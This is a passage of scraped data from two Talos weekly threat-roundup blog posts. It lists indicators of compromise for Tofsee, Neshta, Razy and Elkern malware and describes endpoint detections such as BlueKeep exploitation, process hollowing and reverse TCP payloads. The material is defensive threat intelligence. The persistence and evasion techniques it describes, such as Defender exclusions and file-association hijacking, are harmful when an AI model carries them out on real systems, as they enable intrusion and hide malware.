37ae3f37a90f62a3247ac2b2afaa2a7b7feca603fd9258a23be3b0c06fad3baf 394e282ad6f08c49e67258afb5be535d98ca35b2bffdfd4cc6f866ff909da21c 41dfd05edf2657153e9f265e5f41877660b0fe9b3d4c46d82a0560234fe7d911 54be4270379a47819af99f6b455af363531d0c035f6f645b0505240cbe2e18df 58a71b81fb151fc64383e7adad9aadab56188c8e5107fe157889b598d80331b9 5cde373946029302a628504ae7fe6c26037ba6c6e7cf575aa33258808dc7b4d3 5e3b677a238a772109ab8282964d0a7dc4a68e422471589eeb58dacf4f3b1917 5f5c89d4cae98e32d764146b5ea87879ed6c355171535e1ca1b65f8a5d2fc296 69747e554bef6e4fec803333c19df48b7317848feb58842849fdb3797d41f66c 6d1ed5c4c21f2f9fa42d1cede8411ae9347ae85c03a76dd212856187c66328b3 797adc29fe0dddbfb03aec9344dd2f93a702bb57920f35bd7decb92873b2ea86 79acc4d7034c595c35d2280281699064e114bc6ca7dcc461c2077a2d350f78c4 821923194cc976d5b0785d114769c85b473e7e7316f0bfab3e60f94404bd9a91 8232399d1c7350132d3347c6aeffcea06c38e6c8fbf3527399a51d7fc3bff1bb 831872753224405c5553a509d3ac4af91032d789cba67977e43e1b0b68abe543 91f928319c927531fb3c2863eefd2fff358a962887d8fd8deeeead74d3602562 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-asipuCkmusQ/XbMYIJ0AudI/AAAAAAAAC3A/hZAqgmyXDF8CK4RONMldSt1xzAoKJqOuACLcBGAsYHQ/s1600/1974b3f6d08447d18279bce6cd737aec3438cbda3cc90d8fd625fdc9e06339eb_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-nhBt9C3hzsU/XbMYO4h6WNI/AAAAAAAAC3I/ougbZS8J9D4tq1A9zZ8njBjlwbCnR3CPQCLcBGAsYHQ/s1600/58a71b81fb151fc64383e7adad9aadab56188c8e5107fe157889b598d80331b9_tg.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-djWpLHBjSCk/XbMYVgGnNnI/AAAAAAAAC3M/Wyc-yHP_HOU_X12Y3Aubqupp6jChnKNcACLcBGAsYHQ/s1600/1974b3f6d08447d18279bce6cd737aec3438cbda3cc90d8fd625fdc9e06339eb_malware.png>)\n\n \n\n\n \n\n\n* * 
*\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (69038) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption that can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nMadshi injection detected \\- (2294) \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nProcess hollowing detected \\- (321) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nExcessively long PowerShell command detected \\- (304) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats. 
\nDealply adware detected \\- (226) \nDealPly is adware that claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nKovter injection detected \\- (183) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nGamarue malware detected \\- (156) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (88) \nInstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nPowerShell file-less infection detected \\- (49) \nA PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families. \nReverse tcp payload detected \\- (38) \nAn exploit payload intended to connect back to an attacker-controlled host using TCP has been detected. 
\n \n", "cvss3": {}, "published": "2019-10-25T09:33:00", "type": "talosblog", "title": "Threat Roundup for October 18 to October 25", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2019-10-25T09:33:00", "id": "TALOSBLOG:DC2E9A485DD55B49C0CC8932C0026F33", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nTLDbUoTJvY/threat-roundup-1018-1025.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-23T22:20:46", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 16 and Aug. 23. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d603f5011797.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. 
As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nWin.Trojan.Tofsee-7131053-0 | Trojan | Tofsee is multipurpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. \nWin.Virus.Neshta-7131041-0 | Virus | Neshta is file-infecting malware that also collects sensitive information from an infected machine and sends it to a C2 server. \nWin.Trojan.Razy-7124013-0 | Trojan | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host, encrypts the data, and sends it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence. \nWin.Malware.Elkern-7118026-1 | Malware | Elkern is a worm that spreads via peer-to-peer networks by masquerading as popular movies, games, or software. Once executed, it installs follow-on malware onto the system. \nWin.Packed.Xcnfe-7131484-0 | Packed | This cluster provides generic detection for the Dridex banking trojan that's downloaded onto a target's machine. \nWin.Worm.Vobfus-7123957-0 | Worm | Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its C2 server. 

* * *

## Threat Breakdown

### Win.Trojan.Tofsee-7131053-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES`, value `Config1` | 28
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES`, value `Config3` | 28
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES` | 28
`REGISTRY\USER\.DEFAULT\CONTROL PANEL\BUSES`, value `Config0` | 28
`REGISTRY\USER\.DEFAULT\CONTROL PANEL\BUSES`, value `Config1` | 28
`REGISTRY\USER\.DEFAULT\CONTROL PANEL\BUSES`, value `Config2` | 28
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>` | 28
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, value `Type` | 28
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, value `Start` | 28
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, value `ErrorControl` | 28
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, value `DisplayName` | 28
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, value `WOW64` | 28
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, value `ObjectName` | 28
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>`, value `Description` | 28
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, value `C:\Windows\SysWOW64\fymsrzfu` | 5
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, value `C:\Windows\SysWOW64\buionvbq` | 4
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, value `C:\Windows\SysWOW64\slzfemsh` | 2
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, value `C:\Windows\SysWOW64\yrflksyn` | 2
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, value `C:\Windows\SysWOW64\dwkqpxds` | 2
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, value `C:\Windows\SysWOW64\athnmuap` | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, value `C:\Windows\SysWOW64\kdrxwekz` | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, value `C:\Windows\SysWOW64\wpdjiqwl` | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, value `C:\Windows\SysWOW64\tmagfnti` | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, value `C:\Windows\SysWOW64\zsgmltzo` | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS`, value `C:\Windows\SysWOW64\lesyxfla` | 1

The samples install themselves as a service with a random eight-character name and, in several cases, add a Windows Defender path exclusion for the randomly named directory they drop under `%SystemRoot%\SysWOW64` (see the files list below), so the service binary is never scanned.

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`239[.]255[.]255[.]250` | 28
`69[.]55[.]5[.]250` | 28
`46[.]4[.]52[.]109` | 28
`176[.]111[.]49[.]43` | 28
`85[.]25[.]119[.]25` | 28
`144[.]76[.]199[.]2` | 28
`144[.]76[.]199[.]43` | 28
`43[.]231[.]4[.]7` | 28
`192[.]0[.]47[.]59` | 28
`95[.]181[.]178[.]17` | 28
`211[.]231[.]108[.]47` | 25
`64[.]233[.]186[.]27` | 25
`172[.]217[.]197[.]27` | 25
`98[.]136[.]96[.]74` | 25
`172[.]217[.]5[.]228` | 24
`67[.]195[.]228[.]110` | 23
`173[.]194[.]66[.]27` | 23
`209[.]85[.]203[.]27` | 23
`207[.]69[.]189[.]229` | 22
`98[.]137[.]157[.]43` | 22
`213[.]205[.]33[.]63` | 22
`98[.]136[.]96[.]77` | 22
`23[.]160[.]0[.]108` | 21
`98[.]136[.]96[.]73` | 21
`188[.]125[.]72[.]73` | 21

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 28
`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 28
`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 28
`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 28
`whois[.]iana[.]org` | 28
`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 28
`whois[.]arin[.]net` | 28
`eur[.]olc[.]protection[.]outlook[.]com` | 28
`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 28
`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 28
`honeypus[.]rusladies[.]cn` | 28
`marina99[.]ruladies[.]cn` | 28
`sexual-pattern3[.]com` | 28
`coolsex-finders5[.]com` | 28
`mta5[.]am0[.]yahoodns[.]net` | 27
`smtp[.]secureserver[.]net` | 25
`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 25
`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 25
`mx1[.]emailsrvr[.]com` | 25
`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 25
`hotmail[.]de` | 24
`mx1[.]hanmail[.]net` | 24
`hanmail[.]net` | 23
`mx6[.]earthlink[.]net` | 22
`msx-smtp-mx1[.]hinet[.]net` | 22

*See JSON for more IOCs

The `250[.]5[.]55[.]69[.]*` names are DNS blocklist queries (Spamhaus, CBL, SORBS, SpamCop) for the address 69.55.5.250 written with its octets reversed, i.e. the bot checking whether the address it sends from is already blocklisted; the MX and `protection.outlook.com` names are the mail providers it then spams. Only the four adult-themed domains are specific to this cluster.

Files and or directories created | Occurrences
---|---
`%SystemRoot%\SysWOW64\config\systemprofile` | 28
`%SystemRoot%\SysWOW64\config\systemprofile:.repos` | 28
`%TEMP%\<random, matching '[a-z]{8}'>.exe` | 28
`%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>` | 28
`%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy)` | 5
`%TEMP%\utjfmin.exe` | 1
`%TEMP%\jiyubxc.exe` | 1
`%TEMP%\dcsovrw.exe` | 1
`%TEMP%\rqgcjfk.exe` | 1

#### File Hashes

```text
0009a9ca6636ab37f4c3f21f19741971f5900ae4b18381e7695962a4d4e6f811
013bec317dbcead53cdedaa23feb802e1f2b4e74e016cdff7e39490d22adab30
015ad805d24234339ca8e9f1402c7bcaa1493cefb13f61f3442873fd8f31df97
04d5f2b852d6e9602612ed5b58becccd1eff5e0a8d53671bb3a2209a36ad4a79
059bbb4be73dd7b7055687f9ae779598b2327d61f49b2367ac129685577c8e8b
080b33f9d842b08d082b40f3c49ab9b6727ae47ad154e7c65ee45775d6750693
1348df977c70b9b0ff8cf904c4bd96cbcd58aa332db5c448a63259a1cc7909b2
13e5a8542f77eb807e805cf136d489350d2976af8164c4e9b5daeacdefb4b0f9
16befc710825960d79ccb4f7a2ed12a399e7c4d457e11d141163882e6c6d246e
187746b5d8d8627e46781d34167c08a018ad8a31d2f50033d723d3244c7aad41
1c5da4a767bf010a4eb2ffa39b939f65c21a1dad6b2c40de8fe71db6b5cefab9
1cf13ba4a00fc7dbb79d2e47c2a56c35518494652989cb1a5e932ec676019bb6
1e3f0775aa3feea8393b3073e34fbb0b00b1306cce374fbef5018d7d79a8f556
269b04eaee60cae3fe4428292be87a81561ea94a4a0df7cab400b15411566415
27681e2fb23e38cfcd21dd751d79ac47a866655ae259131e05566ad1be8611e0
280d20ee6383ebe642253f076e194831c53396f9e7d33567054411cd6b167a50
288084927b8287de4320b026474cfcf01270bc2eb63f40cad82a2a95be4acab0
28b7e0c90f7664f834f7adbee912f1f1efc769132d419b16572cbeeba5c6d724
29100329861dd3e48acc75d9ccb0faaf852e44158538db71ccc569df5e84507e
2996e60bf4ef30b47ddb32ee6ea23603bc266562913be0add727791bd2261234
29f84ea78abaf727817f2d2126ccbec9554ec32550897e28e20dd6ac3f9a038e
2b77064e3de89e494664d588ea3c1fd3f7d3863babbc919769d13187250c395c
2ce0b071b4465e9e383c3ce3df2d100cf5e7cc96a12b25e861e7d88d4be77cdf
2ec24ae1e990a9abadb6d5393089a39c4c570d5f138c3651a66daf336b519598
31fb8cfa6e434122f5a2817d33a2d509f0adc23577771d11ab9ad7682ed7bd41
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
Amp |  
Cloudlock | N/A
Cws |  
Email Security |  
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |  
Umbrella |  
Wsa |  

In the coverage tables, a blank cell carried a protection icon in the original post (the product detects this cluster); N/A means the product does not apply to the threat.

#### Screenshots of Detection

AMP: [detection screenshot](<https://1.bp.blogspot.com/-fKM0lB9SX4Q/XWA8RzKYipI/AAAAAAAACX8/deuS24SiVCAD5HhtnKt08L6P6_2sJILOgCLcBGAs/s1600/1c5da4a767bf010a4eb2ffa39b939f65c21a1dad6b2c40de8fe71db6b5cefab9_amp.png>)

ThreatGrid: [detection screenshot](<https://1.bp.blogspot.com/-9GU4IEJuplk/XWA8VxIptGI/AAAAAAAACYA/w_naDcHsEK8F594ImctF20q3jAX0eYSXQCLcBGAs/s1600/1c5da4a767bf010a4eb2ffa39b939f65c21a1dad6b2c40de8fe71db6b5cefab9_tg.png>)

Umbrella: [detection screenshot](<https://1.bp.blogspot.com/-g7jQc8ftvCc/XWA8aTZzNoI/AAAAAAAACYE/-7dc38M9rr8mtjFruoZa5fS0EO-auFMCQCLcBGAs/s1600/213b7ea1e4fee2c08e48c1536b099ab55b0ace638710a8c1920a834ac80648b5_umbrella.png>)

* * *

### Win.Virus.Neshta-7131041-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\CLASSES\EXEFILE\SHELL\OPEN\COMMAND` | 11

Mutexes | Occurrences
---|---
`MutexPolesskayaGlush*.*\u0090svchost.com\u0090exefile\shell\open\command\u2039\u00c0 "%1" %*\u0153\u2018@` | 11

The `\uXXXX` sequences are non-printable bytes that are part of the mutex name. The mutex text, the modified `exefile\shell\open\command` key and the dropped `%SystemRoot%\svchost.com` (below) belong together: Neshta rewrites the `.exe` file association so that every executable launched by the user is started through its own `svchost.com`, which then infects the requested program and runs it.

Files and or directories created | Occurrences
---|---
`\MSOCache\ALLUSE~1\{90140~1\DW20.EXE` | 11
`\MSOCache\ALLUSE~1\{90140~1\dwtrig20.exe` | 11
`\MSOCache\ALLUSE~1\{91140~1\ose.exe` | 11
`\MSOCache\ALLUSE~1\{91140~1\setup.exe` | 11
`%TEMP%\tmp5023.tmp` | 11
`%SystemRoot%\svchost.com` | 11
`%HOMEPATH%\APPLIC~1\Adobe\Reader\9.2\ARM\ARMUPD~1\AdobeARM.exe` | 11
`%HOMEPATH%\APPLIC~1\Adobe\Reader\9.2\ARM\ARMUPD~1\READER~1.EXE` | 11
`%HOMEPATH%\APPLIC~1\Adobe\Setup\{AC76B~1\Setup.exe` | 11
`\SYSTEM~1\_RESTO~1\RP1\A0000050.exe` | 11
`\SYSTEM~1\_RESTO~1\RP1\A0000053.exe` | 11
`\SYSTEM~1\_RESTO~1\RP1\A0000059.exe` | 11
`\SYSTEM~1\_RESTO~1\RP1\A0000060.exe` | 11
`\SYSTEM~1\_RESTO~1\RP1\A0000066.exe` | 11
`\SYSTEM~1\_RESTO~1\RP1\A0000067.exe` | 11
`\SYSTEM~1\_RESTO~1\RP1\A0000070.exe` | 11
`\SYSTEM~1\_RESTO~1\RP1\A0000071.exe` | 11
`\SYSTEM~1\_RESTO~1\RP1\A0000074.exe` | 11
`\SYSTEM~1\_RESTO~1\RP1\A0000073.exe` | 11
`\SYSTEM~1\_RESTO~1\RP1\A0000114.exe` | 11
`\SYSTEM~1\_RESTO~1\RP1\A0000115.exe` | 11
`\SYSTEM~1\_RESTO~1\RP1\A0000116.exe` | 11
`\SYSTEM~1\_RESTO~1\RP1\A0000118.exe` | 11
`\SYSTEM~1\_RESTO~1\RP1\A0000119.exe` | 11
`\SYSTEM~1\_RESTO~1\RP1\A0000120.exe` | 11

*See JSON for more IOCs

#### File Hashes

```text
23e9f0d6be0f5ba18e787052e64fb7ec62410fab4ec8a3b5f11ec58e34dcf4d7
28996ba8b6dc0794260721cb26bbdc207b23af9352234f5eee0c61851c4a3811
397b969c83ad2e1c6efdb492e932ff8a111f0b1cab34f1409d1888784ad9ca6a
5a3535e2815f02762483cdd97b060cac4ec220e28f21ac42d332fc6281a2709e
63e9b564538a88cb7d06e75114ff1e3fc1cf07b973d5c2e74b114361699ba298
793529a8214ced18d6c43239ddc99b60b6cd3ac5055667e4c5878d65c4c24af7
88d1b872c821bd52be9f52677626b319307a316e9218547a66fb9c6597233aa0
9a8af062b9581de41c2fc10673a5760af539f0ad28b94b81bc5bfa4665ea843d
ad15b25e0356c98ca1679abcf41d12ab2a3869f0e7aad18d169c72af55bcb502
f988cbba1b43f688839a203e0916e3e11861df7581c4fc770ead93a63f584c44
fd5476414674ca6a58296181ce38fe772ed7c76cd9cfe026b19e194da43787b0
```

#### Coverage

Product | Protection
---|---
Amp |  
Cloudlock | N/A
Cws |  
Email Security |  
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |  
Umbrella | N/A
Wsa | N/A

#### Screenshots of Detection

AMP: [detection screenshot](<https://1.bp.blogspot.com/-zI0INKvgxe8/XWA9NcylTrI/AAAAAAAACYY/pgFp43RfvSMTG6C6Ok6BwbObjK1_pK9zgCLcBGAs/s1600/5a3535e2815f02762483cdd97b060cac4ec220e28f21ac42d332fc6281a2709e_amp.png>)

ThreatGrid: [detection screenshot](<https://1.bp.blogspot.com/-THgo9rm9UVA/XWA9SUQG_6I/AAAAAAAACYc/dZtNM2s5B9wEf_kl2DPaSUQWvaSL8HkbgCLcBGAs/s1600/5a3535e2815f02762483cdd97b060cac4ec220e28f21ac42d332fc6281a2709e_tg.png>)

* * *

### Win.Trojan.Razy-7124013-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500` | 32
`<HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500\SECDESC` | 32
`<HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500\SID` | 32
`<HKLM>\SECURITY\POLICY\ACCOUNTS\S-1-5-21-2580483871-590521980-3826313501-500\PRIVILGS` | 32
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINLOGIN_INFO`, value `pool_url` | 32
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINLOGIN_INFO`, value `pool_pass` | 32
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, value `Start Windows` | 32
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINLOGIN_INFO` | 32
`<HKLM>\SECURITY\RXACT`, value `Log` | 32
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINLOGIN_INFO`, value `pool_user` | 32

The `WINLOGIN_INFO` key stores the miner's pool URL and credentials under a name chosen to look like a Windows logon setting; the `Run` value `Start Windows` is the persistence entry mentioned in the summary table. The `S-1-5-21-...-500` entries are the local Administrator account's LSA policy records, touched by every sample.

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`94[.]100[.]186[.]119` | 32
`217[.]69[.]128[.]99` | 32
`88[.]99[.]142[.]163` | 14
`136[.]243[.]102[.]167` | 12
`94[.]130[.]143[.]162` | 11
`136[.]243[.]102[.]154` | 10
`78[.]46[.]49[.]212` | 6
`94[.]130[.]9[.]194` | 6
`136[.]243[.]88[.]145` | 6
`136[.]243[.]94[.]27` | 6
`94[.]130[.]64[.]225` | 5
`136[.]243[.]102[.]157` | 5
`46[.]4[.]119[.]208` | 5
`176[.]9[.]147[.]178` | 5

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`xmr[.]pool[.]minergate[.]com` | 32
`cloclo11[.]datacloudmail[.]ru` | 32
`cloclo16[.]datacloudmail[.]ru` | 32

Files and or directories created | Occurrences
---|---
`%APPDATA%\Lopatka\app.exe` | 32
`%APPDATA%\Lopatka\config.json` | 32
`%APPDATA%\Lopatka` | 32
`%System32%\config\SECURITY` | 6
`%System32%\config\SECURITY.LOG1` | 6

#### File Hashes

```text
0137fc231e2d7e412a4e4ebbb670e732e47264034f9ec2493ecbd8000c2eb499
02ab00e9a675adb7b0fb711ba04f29abffe9774d9a79a12cde4041dd1ec81b0d
07ae413be994ec96a7d3e8202cf8917b8635bde5e3f4176dcd218d6cd713db72
088b3da558e94be8b010002638a54ad34edcc5e2557cad98ab0adbfff7ee887b
0bec1af49840202e3f08ee153839630bc15ca00be3c59947d3f34de189b33e43
0c44e2c58e9940b3fc9f2266fcf797e574a24dcf109e136703c37f6b3d0831e5
0c5ea4b44180db65a8833e4808abd600f4ddd2f1f637adf7f89c131aa0cfecff
0cee3e0769dd885c12ac6a214a85275a59bd98937e72e3d03847cfb6f257bd56
0f2b46d1ef3003c93ebddeb87f66e2fe64e338ed36ec868710367e112c36e495
1182ef3ba1044b9341ece945425ed1274e085f374fbbc48917a069de87e53fcc
11e9f442c1f1542f820ffbf23872bafbcfc8fdd2571ac29db34725cee402f3ef
128b0e52a319a8176898acb8561831a6287719202ad4f94dc94fd100ac582335
13b5035f6c4dbcd1a00b2868db39f95cae92b67457e07a208e5eb881d647d132
1839a13f2080086beefa122c5d855580d74059c5d6aba3e1c9759c1e851d092c
184ad59d217ed9d9564436c2f547dfda36250aebf2c29c1350263e506a241aec
1a4426dba7c2baffb9f678acd282e836c8701e497814f95d0c3fe8282e7f0235
1a8c8b017edebaf6f249bda6e91daaecb2b1e2dcbf37b72d5b23bad128fedd3a
1bf6eb53191201bbb8e6281fa417178e1a789f8435b30cf7366cf6bd8fdc3c43
20580370ad7f348ca8709df2da855bdfa2c779a25165b44ced3da6fc70c22d41
21198bdc5acdabc431021f78c6e983e56437b84287e1473431033bc86ba2dca1
2198063b30b7d7195fb574d56571c4f2a699100e34e7d731966fb6c9fc5e90a2
219bdf6c224824fbca243df963f5bb5c6253b56d72c7a2ccdba1af2d2b836172
2573687a28ed782e1df1d2473801c02880a893ef4ee3b2f9664740391818bdee
2d9eec16b891d142303841369dc5b353c2842f3bb623eeee706c7bb316d2bd04
37444d1e21872ad1aca34d764d217dd8ef53c2e199d9c90e296a13535cf06d51
```

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
Amp |  
Cloudlock | N/A
Cws |  
Email Security |  
Network Security |  
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |  
Umbrella | N/A
Wsa |  

#### Screenshots of Detection

AMP: [detection screenshot](<https://1.bp.blogspot.com/-wHxGMl82vpI/XWA9ge1wWAI/AAAAAAAACYg/d9ulvR5fNq0ipy18p56oJl584foA0HZ1QCLcBGAs/s1600/219bdf6c224824fbca243df963f5bb5c6253b56d72c7a2ccdba1af2d2b836172_amp.png>)

ThreatGrid: [detection screenshot](<https://1.bp.blogspot.com/--YGiHY59Ifc/XWA9k0UxRNI/AAAAAAAACYo/vXqcHjZeFX4mep3g1ZueT2SnE8MkUtg-ACLcBGAs/s1600/f6eec67e590b38b34c16c170167776604d334d762fffe96d1fdbe938278a5537_tg.png>)

* * *

### Win.Malware.Elkern-7118026-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\WOW6432NODE\HP710C` | 32

Files and or directories created | Occurrences
---|---
`%SystemRoot%\Temp\AIM Account Stealer Downloader.exe` | 32
`%SystemRoot%\Temp\AikaQuest3Hentai FullDownloader.exe` | 32
`%SystemRoot%\Temp\Battle.net key generator (WORKS!!).exe` | 32
`%SystemRoot%\Temp\Borland Delphi 6 Key Generator.exe` | 32
`%SystemRoot%\Temp\Britney spears nude.exe` | 32
`%SystemRoot%\Temp\CKY3 - Bam Margera World Industries Alien Workshop Full Downloader.exe` | 32
`%SystemRoot%\Temp\Cat Attacks Child Full Downloader.exe` | 32
`%SystemRoot%\Temp\DSL Modem Uncapper.exe` | 32
`%SystemRoot%\Temp\DivX.exe` | 32
`%SystemRoot%\Temp\GTA3 crack.exe` | 32
`%SystemRoot%\Temp\Gladiator FullDownloader.exe` | 32
`%SystemRoot%\Temp\Grand theft auto 3 CD1 crack.exe` | 32
`%SystemRoot%\Temp\Hack into any computer!!.exe` | 32
`%SystemRoot%\Temp\Hacking Tool Collection.exe` | 32
`%SystemRoot%\Temp\Half-life ONLINE key generator.exe` | 32
`%SystemRoot%\Temp\Half-life WON key generator.exe` | 32
`%SystemRoot%\Temp\How To Hack Websites.exe` | 32
`%SystemRoot%\Temp\Internet and Computer Speed Booster.exe` | 32
